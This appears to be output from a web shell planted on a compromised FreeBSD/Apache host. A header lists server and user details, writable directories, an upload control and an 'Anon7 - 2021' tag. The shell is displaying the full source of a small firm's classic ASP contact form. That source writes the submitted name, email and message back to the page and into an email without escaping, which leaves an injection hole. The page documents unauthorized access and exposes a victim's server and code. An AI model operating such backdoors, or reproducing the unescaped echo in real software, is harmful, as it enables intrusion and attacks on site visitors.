KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/marilynaj/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/marilynaj/contact_us.asp
<%
Dim action
action = Request.QueryString("action")
Dim aName, aEmail, aText

aName = Request.Form("Name")
aEmail = Request.Form("E-Mail")
aText = Request.Form("Text")

If action = "send" AND (aName <> "" AND aEmail <> "" AND aText <> "") Then

%>
<html>
<head>
<style type="text/css">
body			{
			background-color: rgb(0,51,51); 
			padding:0px; margin:0px;
			scrollbar-face-color:rgb(149,199,149);
			scrollbar-shadow-color: rgb(0,51,51);
			scrollbar-highlight-color:rgb(200,250,200);
			scrollbar-3dlight-color:rgb(0,51,51);
			scrollbar-darkshadow-color:rgb(0,51,51);
			scrollbar-track-color:rgb(0,51,51);
			scrollbar-arrow-color:rgb(255,255,255);
			}
td.logo			{background-color: rgb(0,51,51); background-image: url("images/top-logo-bg.gif"); background-repeat: no-repeat;}
td.title		{background-image: url("images/title-bg.gif");}
div.title		{background-image: url("images/empty.gif"); padding-left:35px; font-family: Felix Titling; font-size:14pt;color:rgb(0,51,51);}
td.l-side-bar		{background-color: rgb(0,51,51); background-image: url("images/l-side-bar-bg.gif"); background-repeat: repeat-y;}
td.center		{background-color: white; background-repeat: repeat-x;}
td.r-side-bar		{background-color: white; background-image: url("images/r-side-bar-bg.gif"); background-repeat: repeat-y;}
td.bottomNav		{background-color: white; background-image: url("images/bottom-bg.gif"); background-repeat: repeat-x;}
td.portals		{background-color: white; background-image: url("images/mid-stripe-bg.gif"); background-repeat: repeat-x;}
.innerText		{margin:15px;font: 10pt/12pt helvetica,verdana; color:rgb(0,51,51)}
.ddBox			{
			font: 8pt/10pt verdana; color:rgb(0,51,51);
			background-color:white; background-image:url(images/empty.gif);
			border:solid; border-width:1px; border-color:#aaaaaa;
			}

.dBox			{
			font: 8pt/10pt verdana; color:rgb(0,51,51);
			background-color:rgb(200,250,200); background-image:url(images/empty.gif);
			border:solid; border-width:1px; border-color:rgb(149,199,149)
			}


td.dBoxTitle		{font-size:10pt; font-family:Felix Titling; font-weight:bold; background-color:rgb(149,199,149); color:white;}
td.ePlate		{padding:0px;background-image:url(images/employer-plate.jpg);background-repeat:no-repeat;}
td.eCandidate		{padding:0px;background-image:url(images/candidate-plate.jpg);background-repeat:no-repeat;}
p.links			{padding:0px; padding-left:15px; font:8pt/9pt verdana;}
td.copyright		{background-image: url("images/copyright-bg.gif"); background-repeat: repeat-x; padding:0px;}
a:link			{text-decoration:none; color:rgb(0,51,51);font-weight:bold;}
a:visited		{text-decoration:none; color:#4e4e4e}
a:hover			{color:red;}
p.portalText		{font: 8pt/9pt verdana; color:rgb(0,51,51);} 
a.portal		{font: 7pt/9pt verdana; font-weight: bold; color:rgb(0,51,51);}
a.portal:hover		{color:red; }

</style>

<title>Contact Jacobs & Associates, Inc.</title>
<script language="JavaScript">
<!--

if (document.images) {
hOn = new Image (137,29)
hOff = new Image (137,29)
auOn = new Image (137,29)
auOff = new Image (137,29)
cuOn = new Image (137,29)
cuOff = new Image (137,29)
enOn = new Image (137,29)
enOff = new Image (137,29)

hOn.src = "images/h-btn.gif"
hOff.src = "images/h-btn-over.gif"
auOn.src = "images/au-btn.gif"
auOff.src = "images/au-btn-over.gif"
cuOn.src = "images/cu-btn.gif"
cuOff.src = "images/cu-btn-over.gif"
enOn.src = "images/en-btn.gif"
enOff.src = "images/en-btn-over.gif"


}
else {
hOn = ""
hOff = ""
auOn = ""
auOff = ""
cuOn = ""
cuOff = ""
enOn = ""
enOff = ""

document.h = ""
document.au = ""
document.cu = ""
document.en = ""

}

// -->
</script>
</head>
<body bgcolor="white" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table height="100%" width="80%" cellpadding="0" cellspacing="0" border="0" align="center">
  <tr>
  <td class="logo" colspan="3" height="68px"><img src="images/logo.gif"></td>
  </tr>
  <tr>
  <td class="l-side-bar" width="137" valign="top" height="35px"><img src="images/l-side-bar.gif"><br></td>
  <td class="title" valign="top" width="100%"><img src="images/cu-title.gif"></td>
  <td class="r-side-bar" valign="top" width="138"><img src="images/r-side-bar.gif"></td>
  </tr>
  <tr>
  <td class="l-side-bar" valign="top" height="85%"><p><a href="home.asp" onmouseover="document.h.src = hOff.src" onmouseout="document.h.src = hOn.src"><img src="images/h-btn.gif" name="h" border="0"></a><br>
  <a href="about_us.htm" onmouseover="document.au.src = auOff.src" onmouseout="document.au.src = auOn.src"><img src="images/au-btn.gif" name="au" border="0"></a><br>
  <a href="employer_needs.asp" onmouseover="document.en.src = enOff.src" onmouseout="document.en.src = enOn.src"><img src="images/en-btn.gif" name="en" border="0"></a><br>
  <img src="images/cn-btn-over.gif" name="cn" border="0"><br>
  <a href="contact_us.htm" onmouseover="document.cu.src = cuOff.src" onmouseout="document.cu.src = cuOn.src"><img src="images/cu-btn.gif" name="cu" border="0"></a></p></td>
  <td valign="top" style="background-color:white;">
	<div class="innerText">

<%
 ' Populate Email Response
 Dim br, messageSend 
 br = "<br>"
 messageSend = messageSend & "<p><strong>General Contact Information</strong>"
 messageSend = messageSend & "<hr size='1' width='100%'>"
 messageSend = messageSend & "Name of Requestee: " & aName & br
 messageSend = messageSend & "Email Address: " & aEmail & br
 messageSend = messageSend & "Text: <hr size='1'>" & aText & br
 messageSend = messageSend & "</p>"


 Set Mailer = Server.CreateObject("SMTPsvg.Mailer")
 Mailer.FromName   = "Contact Request Form Results"
 Mailer.FromAddress= "[email protected]"
 Mailer.RemoteHost = "smtp.rcn.com"
 Mailer.AddRecipient "[email protected]", "[email protected]"
 Mailer.Subject = "Contact Info Request Form: " & date()
 Mailer.BodyText = messageSend
if Mailer.SendMail then
 Response.Write "<fieldset><legend>Your Information Has Been Sent</legend>" & br
 Response.Write (messageSend)
 Response.Write "</fieldset>"
else
  Response.Write "Mail send failure. Error was " & Mailer.Response
end if
%>
	</div>
<img src="images/empty.gif" width="698" height="1">
  </td>
  <td class="r-side-bar" valign="top"><img src="images/r-side-image.gif"></td>
  </tr>
  <tr>
  <td valign="top" height="49px"><img src="images/biz-plate-02.gif"></td>
  <td class="copyright"><p style="padding-left:15px; font:7pt/8pt verdana; color:rgb(0,51,51);"><a href="home.asp">Home</a> | <a href="about_us.htm">About Us</a> | <a href="contact_us.htm">Contact Us</a> | <a href="employer_needs.asp">Employer Needs</a> | <a href="candidate_needs.asp">Candidate Needs</a>
  <br>&copy;  2002 &nbsp; Jacobs &amp; Associates, Inc. - The Source In Real Estate Placement</p></td>
  <td class="copyright" align="right"><a href="http://www.3flexstudios.com"><img src="images/3flexlogo.gif" border="0"></a></td>
  </tr>
</table>
</body>
</html>
<%
Else
 Response.Redirect "contact_us.htm"
End If
%>

Anon7 - 2021